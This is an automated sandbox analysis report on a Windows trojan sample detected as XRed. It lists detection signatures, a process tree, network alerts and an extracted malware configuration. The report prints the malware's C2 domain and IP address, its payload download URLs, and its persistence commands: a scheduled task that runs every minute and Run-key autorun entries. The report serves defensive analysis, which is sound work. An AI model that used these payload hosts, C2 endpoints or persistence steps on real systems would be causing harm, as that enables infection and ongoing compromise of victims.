Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Machine-PO.exe

Overview

General Information

Sample name:Machine-PO.exe
Analysis ID:1582336
MD5:a6bd561711ea8c2064c20644cceee074
SHA1:cb330a1ad78387bdc401142feecac763ac63d3d9
SHA256:e6f8edcbe69419008b7e54f8554fc1aec66208de10c26a982d624ea91aed8092
Tags:exeknkbkk212user-JAMESWT_MHT
Infos:

Detection

XRed
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected ProcessChecker

Classification

Process Tree

  • System is w10x64
  • Machine-PO.exe (PID: 5988 cmdline: "C:\Users\user\Desktop\Machine-PO.exe" MD5: A6BD561711EA8C2064C20644CCEEE074)
    • ._cache_Machine-PO.exe (PID: 1060 cmdline: "C:\Users\user\Desktop\._cache_Machine-PO.exe" MD5: 3BF7444911198B54B1E8AB53F236683E)
      • cmd.exe (PID: 5524 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7016 cmdline: schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
      • wscript.exe (PID: 756 cmdline: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs MD5: FF00E0480075B095948000BDC66E81F0)
    • Synaptics.exe (PID: 6892 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: ACA4D70521DE30563F4F2501D4D686A5)
      • WerFault.exe (PID: 7816 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6892 -s 2996 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 7144 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 2760 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • TCPKPY.exe (PID: 3240 cmdline: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe MD5: 3BF7444911198B54B1E8AB53F236683E)
  • TCPKPY.exe (PID: 6216 cmdline: "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe" MD5: 3BF7444911198B54B1E8AB53F236683E)
  • Synaptics.exe (PID: 7628 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: ACA4D70521DE30563F4F2501D4D686A5)
  • TCPKPY.exe (PID: 7872 cmdline: "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe" MD5: 3BF7444911198B54B1E8AB53F236683E)
  • TCPKPY.exe (PID: 8020 cmdline: "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe" MD5: 3BF7444911198B54B1E8AB53F236683E)
  • TCPKPY.exe (PID: 8088 cmdline: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe MD5: 3BF7444911198B54B1E8AB53F236683E)
  • TCPKPY.exe (PID: 7772 cmdline: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe MD5: 3BF7444911198B54B1E8AB53F236683E)
  • cleanup

Malware Configuration

Threatname: XRed

{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Machine-PO.exeJoeSecurity_XRedYara detected XRedJoe Security
    Machine-PO.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\UAINOJ.vbsJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
        C:\ProgramData\Synaptics\RCX7868.tmpJoeSecurity_XRedYara detected XRedJoe Security
          C:\ProgramData\Synaptics\RCX7868.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            C:\Users\user\Documents\PIVFAGEAAV\~$cache1JoeSecurity_XRedYara detected XRedJoe Security
              C:\Users\user\Documents\PIVFAGEAAV\~$cache1JoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                Click to see the 2 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                  00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    00000007.00000002.2753117932.0000000002C98000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                      00000007.00000002.2754697002.0000000002E60000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                        Process Memory Space: Machine-PO.exe PID: 5988JoeSecurity_XRedYara detected XRedJoe Security
                          Click to see the 1 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.0.Machine-PO.exe.400000.0.unpackJoeSecurity_XRedYara detected XRedJoe Security
                            0.0.Machine-PO.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Potentially Suspicious Malware Callback Communication
                              Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\Desktop\._cache_Machine-PO.exe, Initiated: true, ProcessId: 1060, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49729
                              Sigma detected: Script Interpreter Execution From Suspicious Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_Machine-PO.exe" , ParentImage: C:\Users\user\Desktop\._cache_Machine-PO.exe, ParentProcessId: 1060, ParentProcessName: ._cache_Machine-PO.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, ProcessId: 756, ProcessName: wscript.exe
                              Sigma detected: Suspicious Script Execution From Temp Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_Machine-PO.exe" , ParentImage: C:\Users\user\Desktop\._cache_Machine-PO.exe, ParentProcessId: 1060, ParentProcessName: ._cache_Machine-PO.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, ProcessId: 756, ProcessName: wscript.exe
                              Sigma detected: WScript or CScript Dropper
                              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_Machine-PO.exe" , ParentImage: C:\Users\user\Desktop\._cache_Machine-PO.exe, ParentProcessId: 1060, ParentProcessName: ._cache_Machine-PO.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, ProcessId: 756, ProcessName: wscript.exe
                              Sigma detected: CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\._cache_Machine-PO.exe, ProcessId: 1060, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UAINOJ
                              Sigma detected: Startup Folder File Write
                              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_Machine-PO.exe, ProcessId: 1060, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UAINOJ.lnk
                              Sigma detected: Suspicious Schtasks From Env Var Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1, CommandLine: schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5524, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1, ProcessId: 7016, ProcessName: schtasks.exe
                              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                              Source: Process startedAuthor: Michael Haag: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_Machine-PO.exe" , ParentImage: C:\Users\user\Desktop\._cache_Machine-PO.exe, ParentProcessId: 1060, ParentProcessName: ._cache_Machine-PO.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, ProcessId: 756, ProcessName: wscript.exe
                              Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Machine-PO.exe, ProcessId: 5988, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                              Sigma detected: Office Macro File Creation
                              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 6892, TargetFilename: C:\Users\user\AppData\Local\Temp\GZrLyJhZ.xlsm

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:25:21.973413+010020448871A Network Trojan was detected192.168.2.849709216.58.206.46443TCP
                              2024-12-30T11:25:21.983606+010020448871A Network Trojan was detected192.168.2.849710216.58.206.46443TCP
                              2024-12-30T11:25:22.983824+010020448871A Network Trojan was detected192.168.2.849715216.58.206.46443TCP
                              2024-12-30T11:25:22.985548+010020448871A Network Trojan was detected192.168.2.849713216.58.206.46443TCP
                              2024-12-30T11:25:23.999293+010020448871A Network Trojan was detected192.168.2.849720216.58.206.46443TCP
                              2024-12-30T11:25:24.000765+010020448871A Network Trojan was detected192.168.2.849719216.58.206.46443TCP
                              2024-12-30T11:25:24.986489+010020448871A Network Trojan was detected192.168.2.849726216.58.206.46443TCP
                              2024-12-30T11:25:25.013805+010020448871A Network Trojan was detected192.168.2.849727216.58.206.46443TCP
                              2024-12-30T11:25:26.525947+010020448871A Network Trojan was detected192.168.2.849739216.58.206.46443TCP
                              2024-12-30T11:25:26.528668+010020448871A Network Trojan was detected192.168.2.849740216.58.206.46443TCP
                              2024-12-30T11:25:27.504824+010020448871A Network Trojan was detected192.168.2.849747216.58.206.46443TCP
                              2024-12-30T11:25:27.506655+010020448871A Network Trojan was detected192.168.2.849745216.58.206.46443TCP
                              2024-12-30T11:25:28.527130+010020448871A Network Trojan was detected192.168.2.849751216.58.206.46443TCP
                              2024-12-30T11:25:28.554577+010020448871A Network Trojan was detected192.168.2.849750216.58.206.46443TCP
                              2024-12-30T11:25:29.499616+010020448871A Network Trojan was detected192.168.2.849754216.58.206.46443TCP
                              2024-12-30T11:25:29.610977+010020448871A Network Trojan was detected192.168.2.849756216.58.206.46443TCP
                              2024-12-30T11:25:30.172789+010020448871A Network Trojan was detected192.168.2.849762216.58.206.46443TCP
                              2024-12-30T11:25:31.148666+010020448871A Network Trojan was detected192.168.2.849768216.58.206.46443TCP
                              2024-12-30T11:25:31.167329+010020448871A Network Trojan was detected192.168.2.849769216.58.206.46443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:25:24.118958+010028221161Malware Command and Control Activity Detected192.168.2.849729172.111.138.1005552TCP
                              2024-12-30T11:26:09.772081+010028221161Malware Command and Control Activity Detected192.168.2.849808172.111.138.1005552TCP
                              2024-12-30T11:26:46.015797+010028221161Malware Command and Control Activity Detected192.168.2.849962172.111.138.1005552TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:25:22.585705+010028326171Malware Command and Control Activity Detected192.168.2.84971469.42.215.25280TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:25:08.484589+010028498851Malware Command and Control Activity Detected192.168.2.849808172.111.138.1005552TCP
                              2024-12-30T11:25:08.484589+010028498851Malware Command and Control Activity Detected192.168.2.849962172.111.138.1005552TCP
                              2024-12-30T11:25:08.484589+010028498851Malware Command and Control Activity Detected192.168.2.849729172.111.138.1005552TCP
                              2024-12-30T11:25:08.484589+010028498851Malware Command and Control Activity Detected192.168.2.849802172.111.138.1005552TCP
                              2024-12-30T11:25:08.484589+010028498851Malware Command and Control Activity Detected192.168.2.849805172.111.138.1005552TCP
                              2024-12-30T11:25:08.484589+010028498851Malware Command and Control Activity Detected192.168.2.850055172.111.138.1005552TCP
                              2024-12-30T11:25:08.484589+010028498851Malware Command and Control Activity Detected192.168.2.849806172.111.138.1005552TCP
                              2024-12-30T11:25:08.484589+010028498851Malware Command and Control Activity Detected192.168.2.849786172.111.138.1005552TCP
                              2024-12-30T11:25:08.484589+010028498851Malware Command and Control Activity Detected192.168.2.850084172.111.138.1005552TCP
                              2024-12-30T11:25:08.484589+010028498851Malware Command and Control Activity Detected192.168.2.849809172.111.138.1005552TCP
                              2024-12-30T11:25:08.484589+010028498851Malware Command and Control Activity Detected192.168.2.849903172.111.138.1005552TCP
                              2024-12-30T11:25:08.484589+010028498851Malware Command and Control Activity Detected192.168.2.849838172.111.138.1005552TCP
                              2024-12-30T11:25:24.118958+010028498851Malware Command and Control Activity Detected192.168.2.849729172.111.138.1005552TCP
                              2024-12-30T11:25:33.601726+010028498851Malware Command and Control Activity Detected192.168.2.849786172.111.138.1005552TCP
                              2024-12-30T11:25:42.653846+010028498851Malware Command and Control Activity Detected192.168.2.849802172.111.138.1005552TCP
                              2024-12-30T11:25:51.662498+010028498851Malware Command and Control Activity Detected192.168.2.849805172.111.138.1005552TCP
                              2024-12-30T11:26:00.695939+010028498851Malware Command and Control Activity Detected192.168.2.849806172.111.138.1005552TCP
                              2024-12-30T11:26:09.772081+010028498851Malware Command and Control Activity Detected192.168.2.849808172.111.138.1005552TCP
                              2024-12-30T11:26:18.834904+010028498851Malware Command and Control Activity Detected192.168.2.849809172.111.138.1005552TCP
                              2024-12-30T11:26:27.913134+010028498851Malware Command and Control Activity Detected192.168.2.849838172.111.138.1005552TCP
                              2024-12-30T11:26:36.944363+010028498851Malware Command and Control Activity Detected192.168.2.849903172.111.138.1005552TCP
                              2024-12-30T11:26:46.015797+010028498851Malware Command and Control Activity Detected192.168.2.849962172.111.138.1005552TCP
                              2024-12-30T11:26:59.990974+010028498851Malware Command and Control Activity Detected192.168.2.850055172.111.138.1005552TCP
                              2024-12-30T11:27:09.023215+010028498851Malware Command and Control Activity Detected192.168.2.850084172.111.138.1005552TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: Machine-PO.exeAvira: detected
                              Source: Machine-PO.exeAvira: detected
                              Source: Machine-PO.exeAvira: detected
                              Antivirus detection for URL or domain
                              Source: http://xred.site50.net/syn/SSLLibrary.dlAvira URL Cloud: Label: malware
                              Antivirus detection for dropped file
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeAvira: detection malicious, Label: HEUR/AGEN.1353217
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeAvira: detection malicious, Label: HEUR/AGEN.1353217
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: HEUR/AGEN.1353217
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\Users\user\Documents\PIVFAGEAAV\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\Users\user\Documents\PIVFAGEAAV\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\ProgramData\Synaptics\RCX7868.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\ProgramData\Synaptics\RCX7868.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\Users\user\AppData\Local\Temp\UAINOJ.vbsAvira: detection malicious, Label: VBS/Runner.VPJI
                              Found malware configuration
                              Source: Machine-PO.exeMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                              Multi AV Scanner detection for dropped file
                              Source: C:\ProgramData\Synaptics\RCX7868.tmpReversingLabs: Detection: 91%
                              Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 92%
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeReversingLabs: Detection: 60%
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeReversingLabs: Detection: 60%
                              Source: C:\Users\user\Documents\PIVFAGEAAV\~$cache1ReversingLabs: Detection: 91%
                              Multi AV Scanner detection for submitted file
                              Source: Machine-PO.exeVirustotal: Detection: 85%Perma Link
                              Source: Machine-PO.exeReversingLabs: Detection: 92%
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
                              Machine Learning detection for dropped file
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeJoe Sandbox ML: detected
                              Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Documents\PIVFAGEAAV\~$cache1Joe Sandbox ML: detected
                              Source: C:\ProgramData\Synaptics\RCX7868.tmpJoe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: Machine-PO.exeJoe Sandbox ML: detected
                              Source: Machine-PO.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49710 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49709 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49716 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49717 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49726 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49727 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49740 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49739 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49744 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49746 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49754 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49756 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49768 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49769 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49771 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49773 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49776 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49777 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49789 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49790 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49792 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49791 version: TLS 1.2
                              Source: Machine-PO.exe, 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: Machine-PO.exe, 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: Machine-PO.exe, 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00252044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00252044
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0025219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0025219F
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_002524A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_002524A9
